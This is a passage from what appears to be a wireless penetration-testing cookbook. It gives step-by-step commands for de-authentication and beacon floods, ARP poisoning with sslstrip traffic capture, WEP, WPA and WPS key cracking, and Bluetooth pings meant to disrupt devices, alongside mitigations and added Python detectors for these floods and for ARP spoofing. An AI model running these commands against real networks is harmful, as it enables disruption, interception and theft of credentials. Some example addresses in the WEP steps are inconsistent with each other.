Chapter 5: Attacking Network Availability
In this chapter, we will cover the following topics:
- Executing a de-authentication flood attack
- Identifying beacon frames
- Spoofing beacon frames
- Creating a beacon flood attack
- ARP cache poisoning
Introduction
We have already explored two components of the CIA triad: confidentiality and integrity. Now, we focus on the third pillar: availability. In simple terms, availability concerns the loss of access to resources such as files, computers, or entire networks, as we will see in this chapter. Losing access to a resource essentially makes it worthless until access is restored. This can be highly disruptive, potentially halting tasks or operations.
Consider a wireless network environment where clients depend on constant, reliable access to files, servers, or the internet. If this access is lost, a business or customer may become unable to function effectively. Partial or hindered availability can also severely impact operations. Imagine a crowded wireless network in a coffee shop or airport that is extremely slow and unreliable. Even if access exists, its poor performance can bring business to a standstill. This is unacceptable and must be addressed.
Mitigating availability attacks in wireless networks is challenging but feasible. Several options exist to make your network more resilient. Here are some potential countermeasures:
- Tuning: Configure your wireless access points to avoid channels and frequencies used by others. This can significantly reduce slowdowns, loss of availability, and range reduction caused by frequency contention and channel congestion. However, you may not always have exclusive use of a channel. Choose a less congested channel for more bandwidth.
- Redundancy: Implement a mesh network, where multiple access points cover an area. If one or more access points become congested, another node can provide clients with a stronger, more reliable signal. While requiring planning, this can yield substantial benefits for slow or congested networks. Modern mesh network solutions are now more user-friendly and cost-effective, suitable for environments from homes to large enterprises.
- Enterprise Authentication: Although mentioned in chapters on confidentiality and integrity, enterprise authentication systems (like RADIUS) also enhance availability. They make it harder for attackers to disrupt network authentication and launch denial-of-service attacks. This forces attackers to exert more effort to take the network offline compared to a standalone access point. The trade-off is increased complexity and expertise required for setup.
- Patches and Updates: Regularly patching and updating firmware and software is crucial. This ensures you are using the latest features and fixes, some of which can help thwart denial-of-service and other availability attacks.
- Configuration: Configuration covers a wide range of aspects, including access point placement, antenna type, the area to be covered, and the number of users requiring wireless access while moving.
This list is not exhaustive. It is essential to stay informed about availability issues, as they significantly impact user perception and acceptance of a wireless network. While confidentiality and integrity are important, users are more likely to notice problems related to availability. Slow or unavailable networks must be addressed from both a user satisfaction and a security standpoint.
Attack Types
There are numerous ways to affect wireless network availability, all sharing the goal of preventing effective connection and use, or causing total network outage.
Before delving into specific attacks, let's define those covered in this chapter:
- Executing a de-authentication flood
- Detecting beacon frames
- Spoofing beacon frames
- Executing a beacon flood
- ARP cache poisoning
- Executing denial-of-service
- Hiding a wireless network
These attacks represent some of the more popular methods for impacting wireless network availability. Other intentional and accidental availability attacks exist, so further research is recommended.
Executing a De-authentication Flood
A de-authentication flood is an interesting and highly effective first attack. The attacker attempts to break the association between a client and an access point. The client will be disconnected and forced to try reconnecting. If the flood is sustained at a high volume, no client can connect to the wireless network for an extended period or at all, depending on the conditions.
It is important to distinguish this attack from jamming. Jamming involves sending out radio signals to block or hinder the frequency used by the wireless network, often using a device that bombards the airwaves with radio traffic. Jamming is indiscriminate; you cannot selectively block only specific clients or networks. Additionally, jamming is often illegal and can result in heavy fines or imprisonment. We will not use jamming in this book.
De-authentication floods are sometimes mistakenly called jamming attacks. However, the attack we are discussing is selective and uses specially crafted frames to target its victim(s), rather than indiscriminate radio traffic.
You might wonder why de-authentication frames exist in wireless networks. They are used to disconnect misbehaving clients or those that need to be disconnected for some reason. For example, they can be used to disconnect malicious clients from your network. Another, more malicious use is to force clients to connect to a rogue access point controlled by the attacker. In this scenario, the attacker sets up their own access point near a legitimate one, sends de-authentication frames to disconnect users from the legitimate network, and then waits for them to connect to the attacker's available access point. The diagram below shows the normal authentication process, and how de-authentication fits in.
One semi-legitimate (used loosely here) use of de-authentication frames involved a hotel chain that used them to force guests to use the hotel's Wi-Fi instead of external providers. The hotel used devices to send de-authentication frames, blocking guests from using external Wi-Fi hotspots, forcing them to pay for the hotel's service. This practice faced legal challenges and is illegal in the United States, with the FCC imposing heavy fines on any business using such techniques.
There is ongoing debate about whether de-authentication floods can be used to create secure spaces where only authorized personnel can access the network. Currently, there is no clear-cut answer.
Another use for de-authentication frames is sniffing the network password or key during penetration testing. The attacker sends de-authentication frames, disconnecting a client. When the client reconnects, the attacker sniffs the generated traffic to capture the handshake. This can also be used for man-in-the-middle attacks, where the attacker de-authenticates the client and forces them to re-authenticate through a malicious access point, capturing credentials as part of the handshake.
Preparation
To begin, you'll need the following:
- A wireless network card capable of monitor mode
- Kali Linux
How to Do It...
To perform a de-authentication flood, we'll combine steps from earlier chapters with some additional parameters.
In this scenario, a client is connected to an access point or router. The attacker will attempt to interrupt this connection.
- First, put your network card into monitor mode. Assuming your wireless adapter is named wlan0, use the following command:
airmon-ng start wlan0
The utility will switch the card to monitor mode and rename it to something like mon0. This allows you to view all traffic. The screenshot below shows the result of the command.
- Use the airodump-ng tool to capture information from the monitor interface:
airodump-ng mon0
This displays a list of wireless access points within range, including their ESSID, channel, and BSSID.
- Select a network and focus the command on it using its BSSID. This will show a list of connected clients:
airodump-ng mon0 -c 1 --bssid 00:05:59:49:A7:A0
Here, -c specifies the channel, and --bssid is the access point's MAC address.
The output will show current client connections. Note the MAC address of the client you want to disconnect, e.g., 00:13:CE:AC:70:BE.
- Finally, de-authenticate the client from the access point:
aireplay-ng -0 1000 -a 00:05:59:49:A7:A0 -c 00:13:CE:AC:70:BE mon0
Here, -0 indicates a de-authentication attack, 1000 is the number of de-authentication packets to send, -a is the router's MAC address, -c is the client's MAC address, and mon0 is the interface.
The screenshot below shows a successful attack. The client is disconnected and cannot re-establish a connection until the attacker stops sending de-authentication messages.
Detection of Beacon Frames
Beacon frames are sent by wireless access points to announce the network's name (SSID), parameters, and other maintenance information. They are transmitted periodically to inform clients of the network's presence.
Here's a breakdown of the components within a beacon frame:
- Timestamp: Synchronizes all clients on the network to the same time, allowing for more efficient operation.
- Beacon Interval: Indicates how frequently the beacon frame is sent. This is configurable on some networks, though not on most consumer-level devices.
- Capability Information: Describes the network's format (infrastructure or ad hoc), whether security features are used, and the type of encryption supported. This information reveals how the network operates.
Adjusting the beacon interval can have trade-offs. A shorter interval allows clients to associate and roam faster but increases network overhead, potentially reducing throughput. A longer interval reduces overhead but slows down association and roaming. Network engineers typically avoid changing the beacon interval unless necessary.
Clients scan for beacon frames to discover available networks. Even after associating with a network, clients continue scanning for other networks to enable seamless roaming if the current network becomes inadequate. Beacons also help synchronize clocks and notify clients of upcoming changes like speed or channel.
Let's capture and analyze beacon frames to understand their content. This is not an attack itself but a precursor to the attacks we'll cover next.
Preparation
You will need:
- A wireless network card supporting monitor mode
- Kali Linux with Wireshark installed
How to Do It...
Kismet is a tool for locating and extracting information from wireless access points and devices. Here, we'll use it to detect beacon frames.
- Open a terminal and run kismet.
- Configure Kismet from the semi-graphical interface using the Tab and Enter keys.
- If you see a gray line with No, use Tab to highlight Yes to confirm starting the Kismet server.
- Press Enter to confirm.
- Press Enter again to confirm you're running Kismet as root.
- Press Enter to start the Kismet server automatically.
- Press Enter again to confirm.
- Press Enter to verify adding a capture source.
- Enter your wireless interface name (e.g., wlan0) in the "Name" field. The screenshot below shows the interface input screen.
- Press Tab, then Enter.
- If the name is correct, Kismet will identify the interface. It may also generate virtual interfaces like wlan0mon.
- When "Close Console Window" appears in the lower-right corner of the shell, use Tab to highlight it and press Enter.
- A list of access points will appear in the upper-left quadrant of the shell.
- Click "View" from the dropdown menu, then "Monitor Activity."
Access point names and details will quickly populate the interface. The information is extracted from the transmitted beacon frames. You will see the name, channel, wireless standard, and other details. Over time, more data may appear for devices that were previously missing some information.
You might notice some interesting entries. For example, you might see a "Probe Networks" section. Expanding it reveals a list of networks from probe requests sent by nearby systems attempting to connect to networks they've previously associated with. This can reveal which networks a system has connected to.
Kismet is passive, meaning it only listens and does not send any frames to trigger responses. It can also detect hidden access points that other tools might miss.
Spoofing Beacon Frames
Now that we understand beacon frames, we can explore how to spoof them. By manipulating beacon frames, an attacker can disrupt a network's operation, slowing it down or making it unavailable.
A key weakness exploited in beacon frame spoofing is the lack of verification or authentication of these frames. While some solutions can detect spoofed frames, this is not common practice. The detection is further complicated by the instability of wireless networks and varying communication methods from different vendors.
It is important to note that spoofing beacon frames is not a trivial attack. It requires patience and effort to execute correctly. However, it is detectable with advanced techniques. Network owners need to understand the potential and deploy appropriate protections.
The process of spoofing beacon frames has two main stages:
- Enable Monitor Mode: Use airmon-ng to put the wireless adapter into monitor mode.
- Send Spoofed Beacons: Use a tool like mdk3, which can generate and send beacon frames with custom names and attributes. This can create a large number of fake access points, confusing and slowing down clients, and potentially disrupting their current connections. This effectively creates a denial-of-service condition.
Preparation
You will need:
- A wireless network card supporting monitor mode
- Kali Linux
How to Do It...
- Put your wireless adapter into monitor mode:
airmon-ng start wlan0
This will rename the interface to, for example, mon0.
- Use airodump-ng to gather information about nearby wireless access points:
airodump-ng mon0
- Once you have a target network, use mdk3 to spoof a beacon frame. For example, to create a fake network named "impa":
mdk3 mon0 b -n "impa" -b 54 -w a -m -c 11
- b: activates beacon flood mode.
- -n "impa": sets the network name.
- -b 54: sets the bitrate to 54 Mbps.
- -w a: enables only WPA2/AES security.
- -m: uses only valid MAC addresses to make filtering harder.
- -c 11: sets the channel to 11.
After this, another wireless device scanning the area should see a new network named "impa."
Creating a Beacon Flood
This recipe builds on the previous one by creating a flood of beacon frames. Instead of a single fake access point, we will continuously send numerous fake beacon frames to confuse nearby clients and cause performance issues. Under certain conditions, a beacon flood can cause scanners, software, or drivers to malfunction or crash, creating a denial-of-service condition. The concept is shown in the diagram below.
By varying the parameters and channels of the fake access points, we can refine and enhance the attack. The initial steps are the same as the previous attack; the difference lies in using the mdk3 utility to change these parameters.
Preparation
You will need:
- A wireless network card supporting monitor mode
- Kali Linux
How to Do It...
- Put your wireless adapter into monitor mode:
airmon-ng start wlan0
- Use airodump-ng to list nearby access points. Note the target's BSSID and channel:
airodump-ng mon0
- To perform the beacon flood:
mdk3 mon0 b -t <BSSID target> -c <channel>
To control the flood rate, you can add the -s option:
mdk3 mon0 b -t station/bssid -s 360
Here, 360 is the number of packets transmitted per second.
To observe the flood, you can run Kismet on another Kali workstation. You will see a large number of beacons representing the attack.
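The de-authentication flood, the beacon fields listed under Detection of Beacon Frames, and the beacon flood above all show up on a monitor interface as bursts of management frames. The following added example (not code from the original, nor from aircrack-ng, mdk3 or Kismet) parses constructed beacon and de-authentication frames and flags both floods with a sliding-window rate check; the BSSID and client MAC are the chapter's examples, while all timestamps, frames, thresholds and function names are assumptions of this example.

```python
"""Toy 802.11 management-frame parser with two rate-based flood detectors.
Added example for this chapter; frames, timestamps and thresholds are constructed."""
import struct
from collections import defaultdict

MGMT, BEACON, DEAUTH = 0, 8, 12          # frame type and the two subtypes used here

def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)

def parse_mgmt_frame(frame: bytes):
    """Parse the 24-byte MAC header; for beacons also the fixed fields and SSID/channel IEs.
    Returns None for anything that is not a management frame."""
    if len(frame) < 24:
        raise ValueError("frame shorter than an 802.11 MAC header")
    fc = frame[0]                         # bits 2-3: type, bits 4-7: subtype
    if (fc >> 2) & 0x3 != MGMT:
        return None
    info = {"subtype": (fc >> 4) & 0xF, "da": mac_str(frame[4:10]),
            "sa": mac_str(frame[10:16]), "bssid": mac_str(frame[16:22])}
    body = frame[24:]
    if info["subtype"] == BEACON and len(body) >= 12:
        # fixed fields: timestamp (8), beacon interval in TU of 1024 us (2), capability (2)
        ts, interval, cap = struct.unpack_from("<QHH", body, 0)
        info.update(timestamp=ts, beacon_interval_tu=interval,
                    infrastructure=bool(cap & 0x0001), privacy=bool(cap & 0x0010))
        off = 12                          # information elements: id, length, value
        while off + 2 <= len(body):
            eid, elen = body[off], body[off + 1]
            val = body[off + 2: off + 2 + elen]
            if eid == 0:
                info["ssid"] = val.decode("utf-8", "replace")
            elif eid == 3 and elen == 1:  # DS Parameter Set carries the channel
                info["channel"] = val[0]
            off += 2 + elen
    elif info["subtype"] == DEAUTH and len(body) >= 2:
        info["reason"] = struct.unpack_from("<H", body, 0)[0]
    return info

def _header(subtype: int, da: bytes, sa: bytes, bssid: bytes) -> bytes:
    fc = (subtype << 4) | (MGMT << 2)
    return bytes([fc, 0]) + b"\x00\x00" + da + sa + bssid + b"\x00\x00"

def build_beacon(bssid: bytes, ssid: str, channel: int, interval=100, privacy=True) -> bytes:
    cap = 0x0001 | (0x0010 if privacy else 0)   # ESS bit, optional Privacy bit
    body = struct.pack("<QHH", 0, interval, cap)
    body += bytes([0, len(ssid)]) + ssid.encode() + bytes([3, 1, channel])
    return _header(BEACON, b"\xff" * 6, bssid, bssid) + body

def build_deauth(bssid: bytes, client: bytes, reason=7) -> bytes:
    return _header(DEAUTH, client, bssid, bssid) + struct.pack("<H", reason)

def _max_in_window(times, window_s: float) -> int:
    """Largest number of timestamps that fall inside any sliding window of window_s seconds."""
    times, j, worst = sorted(times), 0, 0
    for i, t in enumerate(times):
        while times[j] < t - window_s:
            j += 1
        worst = max(worst, i - j + 1)
    return worst

def detect_deauth_flood(frames, window_s=1.0, threshold=20) -> dict:
    """BSSIDs whose de-authentication rate exceeds the threshold, mapped to the peak count."""
    per_bssid = defaultdict(list)
    for t, f in frames:
        p = parse_mgmt_frame(f)
        if p and p["subtype"] == DEAUTH:
            per_bssid[p["bssid"]].append(t)
    peaks = {b: _max_in_window(ts, window_s) for b, ts in per_bssid.items()}
    return {b: n for b, n in peaks.items() if n > threshold}

def detect_beacon_flood(frames, window_s=1.0) -> int:
    """Peak number of never-before-seen BSSIDs appearing within one window (flood signature)."""
    first_seen = {}
    for t, f in frames:
        p = parse_mgmt_frame(f)
        if p and p["subtype"] == BEACON and p["bssid"] not in first_seen:
            first_seen[p["bssid"]] = t
    return _max_in_window(first_seen.values(), window_s)

def sample_capture():
    """Constructed capture using the chapter's example AP and client MAC addresses."""
    ap, client = bytes.fromhex("00055949a7a0"), bytes.fromhex("0013ceac70be")
    frames = [(i * 0.1024, build_beacon(ap, "corp-wifi", 1)) for i in range(20)]   # normal beacons
    frames += [(1.0 + i * 0.01, build_deauth(ap, client)) for i in range(50)]       # deauth burst
    frames += [(1.5 + i * 0.01, build_beacon(bytes([2, 0, 0, 0, 0, i]), f"impa{i}", 11, privacy=False))
               for i in range(40)]                                                  # 40 fake APs
    return frames

if __name__ == "__main__":
    cap = sample_capture()
    print(detect_deauth_flood(cap), detect_beacon_flood(cap))   # {'00:05:59:49:a7:a0': 50} 40
```

A real capture would also contain data and control frames; the parser returns None for those so the detectors skip them.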
ARP Cache Poisoning
This technique manipulates existing network components to perform operations like sniffing or man-in-the-middle attacks. ARP, or Address Resolution Protocol, links a logical IP address to a physical MAC address.
Here's how ARP works: Client A wants to communicate with Client B on the same subnet. Client A checks its ARP cache for a mapping of Client B's IP address to a MAC address. If found, it uses that information. If not, Client A sends an ARP broadcast on the subnet. Client B, upon receiving this broadcast, sends back its IP and MAC address combination. Client A then uses this information to address and send data. This mapping is also stored in the local ARP cache for future use. A screenshot of an ARP cache is shown below.
During an ARP cache poisoning attack, the attacker sends a forged ARP reply to the victim. The attacker doesn't wait for the victim to send an ARP request; they actively inject the reply. The reply contains a false IP-to-MAC mapping. For example, the victim might be looking for the MAC address associated with a particular IP. The attacker's forged reply maps that IP to the attacker's MAC address. When the victim caches this false mapping, future traffic intended for the original IP address will be sent to the attacker's system. The process is illustrated in the diagram below.
There are two sides to IP-to-MAC resolution: ARP (used to resolve IP to MAC) and RARP (Reverse ARP) which resolves MAC to IP. While they are companion protocols, we only need ARP for this attack.
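The injected-reply pattern described above is visible on the wire: a reply that no request asked for, followed by an existing IP-to-MAC binding changing. The added example below (not the code of arpspoof or of any real monitoring tool) replays a constructed exchange using the chapter's example IP addresses and raises both alerts; the MAC addresses and the ArpWatcher class are assumptions of this example.

```python
"""Toy ARP watcher that flags the poisoning pattern described in the text.
Added example for this chapter; packets are constructed, not captured."""
import struct

ETH_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2

def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)

def ip_str(b: bytes) -> str:
    return ".".join(str(x) for x in b)

def parse_arp(pkt: bytes):
    """Parse an Ethernet II frame carrying IPv4-over-Ethernet ARP; None for anything else."""
    if len(pkt) < 42 or struct.unpack("!H", pkt[12:14])[0] != ETH_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", pkt[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"op": op, "eth_src": mac_str(pkt[6:12]),
            "sha": mac_str(pkt[22:28]), "spa": ip_str(pkt[28:32]),
            "tha": mac_str(pkt[32:38]), "tpa": ip_str(pkt[38:42])}

def build_arp(op: int, sha: bytes, spa: bytes, tha: bytes, tpa: bytes, eth_src=None) -> bytes:
    """Build a constructed ARP packet; the Ethernet source defaults to the ARP sender MAC."""
    eth_dst = b"\xff" * 6 if op == ARP_REQUEST else tha
    eth = eth_dst + (eth_src or sha) + struct.pack("!H", ETH_ARP)
    return eth + struct.pack("!HHBBH", 1, 0x0800, 6, 4, op) + sha + spa + tha + tpa

class ArpWatcher:
    """Tracks IP->MAC bindings and outstanding requests to spot injected replies."""

    def __init__(self):
        self.table = {}       # ip -> mac, as hosts on the segment would cache it
        self.pending = set()  # (requester ip, target ip) of requests not yet answered
        self.alerts = []      # (kind, ip, detail)

    def observe(self, pkt: bytes):
        a = parse_arp(pkt)
        if a is None:
            return None
        if a["op"] == ARP_REQUEST:
            self.pending.add((a["spa"], a["tpa"]))
        elif a["op"] == ARP_REPLY:
            if a["eth_src"] != a["sha"]:          # frame source and ARP sender disagree
                self.alerts.append(("sender-mac-mismatch", a["spa"], a["sha"]))
            if (a["tpa"], a["spa"]) in self.pending:
                self.pending.discard((a["tpa"], a["spa"]))
            else:                                  # nobody asked: the injected-reply pattern
                self.alerts.append(("unsolicited-reply", a["spa"], a["sha"]))
        old = self.table.get(a["spa"])
        if old is not None and old != a["sha"]:    # an existing binding just changed
            self.alerts.append(("mapping-changed", a["spa"], f"{old} -> {a['sha']}"))
        self.table[a["spa"]] = a["sha"]
        return a

def run_scenario() -> ArpWatcher:
    """Constructed exchange: legitimate resolution of the gateway, then a forged reply."""
    victim_mac, gw_mac, attacker_mac = (bytes.fromhex(h * 6) for h in ("aa", "bb", "cc"))
    victim_ip, gw_ip = bytes([192, 168, 1, 23]), bytes([192, 168, 0, 253])
    w = ArpWatcher()
    w.observe(build_arp(ARP_REQUEST, victim_mac, victim_ip, bytes(6), gw_ip))    # who has the gateway?
    w.observe(build_arp(ARP_REPLY, gw_mac, gw_ip, victim_mac, victim_ip))        # gateway answers
    w.observe(build_arp(ARP_REPLY, attacker_mac, gw_ip, victim_mac, victim_ip))  # forged reply
    return w

if __name__ == "__main__":
    for alert in run_scenario().alerts:
        print(*alert)   # unsolicited-reply ... then mapping-changed bb:... -> cc:...
```

On a live segment, arpwatch reports the same "changed ethernet address" event for the second alert.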
Preparation
You will need:
- A wireless network card supporting monitor mode
- Kali Linux
How to Do It...
- Enable IP forwarding. This allows traffic to be redirected through the attacker's system.
echo "1" > /proc/sys/net/ipv4/ip_forward
Verify it is set:
cat /proc/sys/net/ipv4/ip_forward
The output should be 1. Run sysctl -p to apply the change.
- Redirect traffic using iptables. For example, redirect traffic destined for port 80 to port 8880, and port 443 to port 8883:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8880
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8883
- Use arpspoof to change the victim's ARP cache. For example, to change the default gateway's MAC address in the victim's cache:
arpspoof -i eth0 -t 192.168.1.23 192.168.0.253
Similarly, perform the reverse to poison the gateway's cache:
arpspoof -i eth0 -t 192.168.0.253 192.168.1.23
After this, you can capture requests in transit using tools like sslstrip or driftnet.
- sslstrip: A sniffing and man-in-the-middle tool designed to capture information transmitted via SSL. Use it like this:
python /usr/share/sslstrip/sslstrip.py -p -s -l 8880
Captured data will be logged in /usr/share/sslstrip/sslstrip.log.
- driftnet: A GUI-based tool that captures images viewed from a browser. Simply run driftnet in a terminal. The output will be displayed as shown below.
Chapter 6: Authentication Attacks
This chapter explores attacks targeting authentication mechanisms and related components. Successfully attacking authentication can allow an attacker to gain easy access to systems and resources. We will start by understanding what authentication is and how it works.
When a user logs into a system, they first provide an identity (e.g., username). This identity alone is insufficient for access. The user must then undergo authentication to prove they are the person they claim to be, typically by providing a password or some secret information. The authentication process is shown in the diagram below.
There are three widely recognized factors of authentication:
- Factor 1 (Knowledge): Something you know, like a password, passphrase, or PIN. This is the most common form of authentication.
- Factor 2 (Possession): Something you have, like a key, ATM card, or a token that generates a special code. This is less common in wireless networks, but is used for accessing corporate or guest networks.
- Factor 3 (Inherence): Something you are, also known as biometrics. This uses characteristics like fingerprints, iris patterns, or facial recognition. This is rarely used for wireless authentication.
Authentication verifies your identity but does not grant access. Access is determined by authorization, which compares your verified identity against a set of rules configured by the system owner.
Authentication is not limited to wireless; it protects various applications, devices, and networks. In wireless networks, authentication involves several technologies:
- Encryption: Crucial for protecting the confidentiality and integrity of credentials in transit and storage.
- Pre-Shared Key (PSK) Systems: Uses a common key on all devices for authentication. This is common in home and small business environments, typically as non-enterprise WEP, WPA, or WPA2.
- Enterprise Authentication: Uses a centralized authentication server (e.g., RADIUS) for scalable and centrally managed authentication. This is preferred in larger environments.
Attack Types
Attacks targeting wireless authentication include:
- WEP attacks
- WPA attacks
- WPA2 attacks
- WPS attacks
WEP Attacks
WEP (Wired Equivalent Privacy) was an early security protocol designed when wireless security was still nascent. It had significant weaknesses, making it a prime target for attacks. WEP is obsolete and should not be used in any active network due to its vulnerability.
WEP used the RC4 stream cipher with a 40-bit key plus a 24-bit initialization vector (IV). The 40-bit key length was a major weakness due to export restrictions at the time. Later, the key length was increased to 104 bits plus a 24-bit IV (128-bit total), but the protocol remained flawed.
WEP supports two authentication methods:
- Open System Authentication (OSA): No authentication is performed; any client can associate. However, the WEP key is still used for encryption.
- Shared Key Authentication (SKA): Clients must provide the WEP key to authenticate. This is a four-step process: the client requests authentication, the AP sends a challenge, the client encrypts the challenge with the WEP key, and the AP decrypts it and compares it with the original challenge. If they match, authentication is successful. A diagram of the WEP process is shown below.
While SKA might seem more secure, it can actually be less secure because the challenge and encrypted response are exchanged, potentially revealing information about the key.
The vulnerability of WEP stems from the short 24-bit IV. On a busy network, the same IV, and therefore the same per-packet RC4 key, is reused relatively quickly. Approximately 5,000 packets can be enough for a 50% chance of a reuse. By capturing enough packets (e.g., 250,000 for a 64-bit key, 1,500,000 for a 128-bit key), an attacker can recover the key. This is often done within minutes.
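The figure of roughly 5,000 packets for a 50% chance of a repeat follows from the birthday bound. The derivation below is added here (it is not in the original) and assumes each packet's 24-bit IV is drawn uniformly at random from the N = 2^24 possible values:

\[
P(\text{some IV repeats among } n \text{ packets}) \approx 1 - \exp\!\left(-\frac{n(n-1)}{2N}\right), \qquad N = 2^{24} = 16\,777\,216 .
\]

\[
P = \tfrac{1}{2} \;\Longrightarrow\; n \approx \sqrt{2N \ln 2} = \sqrt{2 \cdot 16\,777\,216 \cdot 0.6931} \approx 4\,823 .
\]

Every repeat hands an eavesdropper two packets encrypted with the same RC4 keystream, which is why lengthening the key to 104 bits did not help: the IV, not the key, sets the reuse rate.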
Preparation
You will need:
- A wireless network card supporting monitor mode
- Kali Linux
- A second wired or wireless adapter connected to the internet
How to Do It...
The goal is to capture enough IVs to crack the WEP key. This can be sped up by injecting packets into the network to generate more traffic. The steps are:
- Enable monitor mode on the specific channel of the target AP:
airmon-ng start wlan0 9
Here, 9 sets the channel to 9 (adjust to the target's channel).
- Test injection ability:
aireplay-ng -9 -e ganon -a 00:28:6C:E4:40:80 wlan0
Replace ganon with the network name and the MAC address with the target's BSSID.
- Capture packets with airodump-ng:
airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output wlan0
This captures traffic to files with the prefix "output".
- Perform fake authentication with the access point:
aireplay-ng -1 0 -e ganon -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 wlan0
Here, -1 indicates fake authentication, 0 is the reassociation timing, and -h is our card's MAC address.
Alternatively, for more finicky APs:
aireplay-ng -1 6000 -o 1 -q 10 -e ganon -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 wlan0
If successful, you will receive a message indicating successful association.
- Inject ARP packets to generate traffic:
aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 wlan0
This will start injecting ARP requests. The number of packets captured by airodump-ng should increase rapidly.
- Attempt to crack the key:
aircrack-ng -b 00:14:6C:7E:40:80 output*.cap
This can be run while the injection is ongoing. The WEP key will be calculated and presented. The key will be in hexadecimal format, often with colons between characters.
WPA and WPA2 Attacks
WPA (Wi-Fi Protected Access) was designed as an immediate upgrade from WEP to address its vulnerabilities. It was based on the IEEE 802.11i standard and implemented TKIP (Temporal Key Integrity Protocol), which dynamically generates a new 128-bit key for each packet. WPA also introduced a Message Integrity Check (MIC) to prevent packet tampering and replay attacks. A diagram of the WPA process is shown below.
WPA has two main authentication modes:
- WPA Personal (WPA-PSK): Uses a pre-shared key (PSK), a 256-bit shared key. This is suitable for home and small office networks without a centralized authentication server.
- WPA Enterprise (WPA-802.1x): Uses a centralized authentication server (like RADIUS) for enterprise networks. This provides stronger security and centralized management. A diagram of the enterprise process is shown below.
- Wi-Fi Protected Setup (WPS): A simplified setup mechanism for WPA/WPA2 networks. It is discussed in detail in the next recipe.
Preparation
You will need:
- A wireless network card supporting monitor mode
- Kali Linux
- A second wired or wireless adapter connected to the internet
How to Do It...
The goal is to crack the WPA PSK by capturing the four-way handshake when a client connects to the network.
- Enable monitor mode on the interface:
airmon-ng start wlan0
If you encounter errors, use airmon-ng check kill first.
- View the target network and its clients:
airodump-ng wlan0
Keep this terminal open.
- Capture packets on the target channel:
airodump-ng -c channel --bssid [bssid of wifi] -w [path to write the data] wlan0mon
- De-authenticate a connected client to capture the handshake:
aireplay-ng --deauth 10 -a [router bssid] interface
You can optionally specify a client MAC with -c <client mac>. The client will be disconnected and when it reconnects, the four-way handshake will be captured.
- Crack the PSK using a wordlist:
aircrack-ng -b [bssid of router] -w [path to word list] [path to capture packets]
For example:
aircrack-ng -b 00:14:6C:7E:40:80 -w /root/Desktop/wordlist.txt capture.cap
Replace the paths with your own. A wordlist can be downloaded or found within Kali Linux.
Attacking WPS
WPS (Wi-Fi Protected Setup) was introduced to simplify the process of connecting clients to WPA/WPA2 secured networks. It is available only if both the router and client support it.
WPS can work in several ways:
- Push Button Configuration (PBC): Press a button on the router and then a button on the client device.
- PIN Entry: The router has an 8-digit PIN (often printed on a label). The client enters this PIN to connect.
The PIN method is vulnerable to brute-force attacks because the PIN is divided into two 4-digit parts. The last digit is a checksum, leaving 7 effective digits. The first 4 digits have 10,000 combinations, and the last 3 have 1,000 combinations, totaling 11,000 possible PINs. On average, only 5,500 guesses are needed to find the correct PIN. This is trivial for modern computers.
Preparation
You will need:
- A wireless network card supporting monitor mode
- Kali Linux
How to Do It...
- Start monitor mode:
airmon-ng start wlan0
- Use wash to find WPS-enabled networks:
wash -i mon0
This will list networks, showing their WPS lock status (unlocked networks are more likely to be vulnerable).
- Use reaver to brute-force the WPS PIN:
reaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv
Replace the channel (-c) and BSSID (-b) with those of your target. The -vv flag enables verbose output.
Once the PIN is cracked, reaver will reveal the WPA password.
Chapter 7: Bluetooth Attacks
This chapter explores Bluetooth technology, its vulnerabilities, and related attacks.
A Brief History of Bluetooth
Bluetooth was invented by Ericsson in 1989. It was initially designed as a short-range radio technology for communication between personal computers and headsets. The goal was to enable different devices to communicate wirelessly over short distances. The name "Bluetooth" comes from the 10th-century Danish king Harald Bluetooth, who united warring tribes. Similarly, Bluetooth technology unifies different technologies under a single standard. The Bluetooth logo is a combination of the king's initials.
Bluetooth operates in the 2.4 GHz ISM band and uses frequency-hopping spread spectrum. It is a packet-based protocol with a master-slave architecture. A master device can communicate with up to seven slaves in a piconet.
Bluetooth Operations
Devices communicate through a pairing process. One device is set to discoverable mode (like a Wi-Fi SSID). The other device scans for it, selects it, and confirms a PIN code. This establishes a trusted connection.
The Bluetooth Protocol Stack
The protocol stack includes core protocols (Baseband, LMP, L2CAP, SDP), cable replacement protocol (RFCOMM), telephony control protocol (TCS Binary, AT commands), and adopted protocols (PPP, UDP/TCP/IP, OBEX, WAP, vCard, etc.). The Host Controller Interface (HCI) provides a command interface for tools like hciconfig, hcidump, and hcitool.
Bluetooth Vulnerabilities
Bluetooth has several vulnerabilities:
- Software Vulnerabilities: Bugs in software and drivers can be exploited.
- Eavesdropping: Though encryption helps, older Bluetooth versions use weaker encryption.
- Denial-of-Service (DoS): Disrupting Bluetooth signals or overwhelming a device.
- Hardware Defects: Many devices, like cheap headsets, lack firmware updates to fix vulnerabilities.
- Default Values: Some devices have hardcoded PINs that cannot be changed, making them easy targets.
Choosing Bluetooth Hardware
Most modern devices have built-in Bluetooth. For enhanced performance, such as increased range (from the standard ~10 meters to hundreds of feet), a specialized Bluetooth adapter with an external antenna may be necessary. For tasks like packet injection, a dedicated external adapter is almost always required.
Attack Types
Attacks covered in this chapter include:
- Bluesmacking
- Bluetooth Hijacking (Bluejacking)
- Bluesnarfing
- MAC Address Spoofing
- Man-in-the-Middle Attacks
1. Bluesmacking (Bluetooth DoS)
This is a DoS attack where an oversized packet is sent to a Bluetooth device, potentially causing it to freeze, crash, or reboot. This is similar to the classic "ping of death" attack. Use tools like l2ping to send large pings.
Preparation: A Bluetooth adapter, Kali Linux.
How to Do It:
- Check the adapter:
hciconfig
- Bring it up:
hciconfig hci0 up
- Scan for devices:
hcitool scan
- Ping a device:
l2ping <MAC Address>
2. Bluetooth Hijacking (Bluejacking)
